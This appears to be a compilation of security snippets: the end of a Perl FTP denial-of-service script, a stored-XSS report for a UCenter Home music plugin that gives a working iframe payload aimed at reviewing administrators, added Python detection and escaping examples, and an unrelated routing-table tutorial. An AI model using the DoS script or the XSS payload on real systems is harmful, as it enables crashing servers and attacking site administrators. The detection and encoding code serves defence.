print " [+] Payload sent, now checking FTP server state
";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful
";
print " [!] DoS did not seem to work
";
print "   ** $ftp2
";

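The script above crashes the server with a single DELE command carrying a 2000-byte argument, which is also the simplest thing to look for on the defensive side. The Python below is an added example, not part of the corelanc0d3r advisory: it scans FTP control-channel log lines for commands whose argument length is far outside normal use. The log format and the length threshold are my own assumptions; the sample lines are constructed to mirror the session the script produces.

```python
"""Flag FTP control-channel commands with abnormally long arguments.

Added example, not part of the advisory; the log format and the threshold
are my own assumptions.
"""
import re
from typing import Iterable

# Assumed threshold: FTP command arguments are paths, user names or host/port
# strings, so anything approaching the 2000 bytes used above is far outside
# normal use. 512 is a conservative starting point; tune it per server.
MAX_ARG_LEN = 512

# Assumed log format: "<timestamp> <client-ip> <COMMAND> [argument]".
_LINE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$")


def oversized_commands(lines: Iterable[str], limit: int = MAX_ARG_LEN) -> list[dict]:
    """Return one record per command whose argument exceeds `limit` bytes.

    PASS is reported without its argument so an alert never carries a password.
    """
    hits = []
    for line in lines:
        m = _LINE.match(line.rstrip("\r\n"))
        if not m:
            continue
        cmd = m.group("cmd").upper()
        arg = m.group("arg") or ""
        arg_len = len(arg.encode())
        if arg_len > limit:
            hits.append({
                "ts": m.group("ts"),
                "client": m.group("ip"),
                "command": cmd,
                "arg_len": arg_len,
                "arg_preview": "" if cmd == "PASS" else arg[:32],
            })
    return hits


# Constructed sample log modelled on the session the exploit script produces.
SAMPLE_LOG = [
    "2009-12-30T10:00:01 10.0.0.5 USER test",
    "2009-12-30T10:00:01 10.0.0.5 PASS secret",
    "2009-12-30T10:00:02 10.0.0.5 PWD",
    "2009-12-30T10:00:03 10.0.0.5 DELE " + "A" * 2000,
    "2009-12-30T10:00:04 10.0.0.5 QUIT",
]

if __name__ == "__main__":
    for hit in oversized_commands(SAMPLE_LOG):
        print(hit)
```

A follow-up connection failing right after such a command, which is exactly what the script checks for, is the second half of the detection: the oversized argument followed by the service dropping off the port.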


UCenter Home music plugin XSS cross-site vulnerability
Exploitation method: add a piece of music, and in the music title field enter "><iframe src=http://www.sitedir.com.cn width=500 height=500></iframe>
Then fill in the rest normally and publish. Uploaded music has to be approved by an administrator before it is published,
so when the administrator reviews it, they get hit. This vulnerability is quite severe.
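The report above works because the title is written into an HTML attribute without encoding, so `">` closes the attribute and the tag and the rest of the value is parsed as markup. The Python below is an added example, not the plugin's code: a raw-concatenation renderer next to one that escapes the value for attribute and text context, plus a small parser-based check that counts the tags a browser-like parser actually sees. Function names are mine; the payload is the one quoted in the report.

```python
"""Contextual output encoding for a user-supplied title rendered into HTML.

Added example for the UCenter Home report above; not the plugin's code.
"""
import html
from html.parser import HTMLParser


def render_title_unsafe(title: str) -> str:
    """What a template that concatenates raw input looks like (the bug)."""
    return f'<a href="/music/play" title="{title}">{title}</a>'


def render_title(title: str) -> str:
    """Escape for both contexts the value lands in: attribute and element text.

    html.escape(quote=True) turns & < > " ' into entities, so a value cannot
    close the quoted attribute nor start a tag in the text node.
    """
    safe = html.escape(title, quote=True)
    return f'<a href="/music/play" title="{safe}">{safe}</a>'


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment: str) -> list[str]:
    """Return the start tags a browser-like parser sees in the fragment."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


# The payload quoted in the report, used here as a constructed test input.
PAYLOAD = '"><iframe src=http://www.sitedir.com.cn width=500 height=500></iframe>'

if __name__ == "__main__":
    print("unsafe :", start_tags(render_title_unsafe(PAYLOAD)))
    print("encoded:", start_tags(render_title(PAYLOAD)))
```

The moderation queue is the dangerous place here: the administrator is the one who opens the page, so the encoding has to happen wherever the title is rendered, including back-office views that are often skipped.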



How to read a routing table
Source:
--------------------------------------------------------------------------------
Active Routes:
Network Destination        Netmask          Gateway          Interface        Metric
0.0.0.0                    0.0.0.0          192.168.123.254  192.168.123.88   1
0.0.0.0                    0.0.0.0          192.168.123.254  192.168.123.68   1
127.0.0.0                  255.0.0.0        127.0.0.1        127.0.0.1        1
192.168.123.0              255.255.255.0    192.168.123.68   192.168.123.68   1
192.168.123.0              255.255.255.0    192.168.123.88   192.168.123.88   1
192.168.123.68             255.255.255.255  127.0.0.1        127.0.0.1        1
192.168.123.88             255.255.255.255  127.0.0.1        127.0.0.1        1
192.168.123.255            255.255.255.255  192.168.123.68   192.168.123.68   1
192.168.123.255            255.255.255.255  192.168.123.88   192.168.123.88   1
224.0.0.0                  224.0.0.0        192.168.123.68   192.168.123.68   1
224.0.0.0                  224.0.0.0        192.168.123.88   192.168.123.88   1
255.255.255.255            255.255.255.255  192.168.123.68   192.168.123.68   1
Default Gateway: 192.168.123.254
--------------------------------------------------------------------------------
======================================================================
Current routes:
destination: the destination network segment
mask: the subnet mask
interface: the IP of this router's outgoing port used to reach that destination
gateway: the IP of the next-hop router's incoming port. The router uses interface and gateway to define a link to the next router; normally interface and gateway are on the same network segment.
metric: hop count, the quality of this route entry. In general, if there are several route entries to the same destination, the router uses the one with the smaller metric.

Entry 1, default route: when a packet's destination network is not in your routing table, this is where your router should send that packet! The default route's gateway is determined by the default gateway of your connection. This entry means: when I receive a packet whose destination network is not in my routing table, I send it out through interface 192.168.123.88 to the address 192.168.123.254, which is an interface of the next router; the packet is thereby handed to the next router to deal with and is no longer my concern. Line quality of this entry: 1.

Entry 2, default route: this entry means: when I receive a packet whose destination network is not in my routing table, I send it out through interface 192.168.123.68 to the address 192.168.123.254, which is an interface of the next router; the packet is thereby handed to the next router to deal with and is no longer my concern. Line quality of this entry: 1.

Entry 3, local loopback: every address in the 127.0.0.0 network points to this machine itself; this entry says where such a packet should be sent when it is received. Line quality of this entry: 1.

Entry 4, directly connected network route: how the router handles packets destined for a directly connected network. In this case the interface and gateway of the entry are the same. When I receive a packet whose destination network is 192.168.123.0, I send it out directly through interface 192.168.123.68, because that port is directly connected to the 192.168.123.0 network. Line quality of this entry: 1.

Entry 5, directly connected network route: when I receive a packet whose destination network is 192.168.123.0, I send it out directly through interface 192.168.123.88, because that port is directly connected to the 192.168.123.0 network. Line quality of this entry: 1.

Entry 6, local host route: how the router handles packets sent to itself. When I receive a packet whose destination is 192.168.123.68, I accept it, because the packet is addressed to me. Line quality of this entry: 1.

Entry 7, local host route: how the router handles packets sent to itself. When I receive a packet whose destination is 192.168.123.88, I accept it, because the packet is addressed to me. Line quality of this entry: 1.

Entry 8, local broadcast route: how the router handles a local broadcast for a directly connected network. When I receive a broadcast packet whose destination is 192.168.123.255, I send it out as a broadcast from interface 192.168.123.68. Line quality of this entry: 1.

Entry 9, local broadcast route: how the router handles a local broadcast for a directly connected network. When I receive a broadcast packet whose destination is 192.168.123.255, I send it out as a broadcast from interface 192.168.123.88. Line quality of this entry: 1.

Entry 10, multicast route: how the router handles a multicast packet. When I receive a multicast packet, I send it out as multicast from interface 192.168.123.68. Line quality of this entry: 1.

Entry 11, multicast route: how the router handles a multicast packet. When I receive a multicast packet, I send it out as multicast from interface 192.168.123.88. Line quality of this entry: 1.

Entry 12, broadcast route: how the router handles a limited (all-ones) broadcast. When I receive a limited broadcast packet, I drop it.


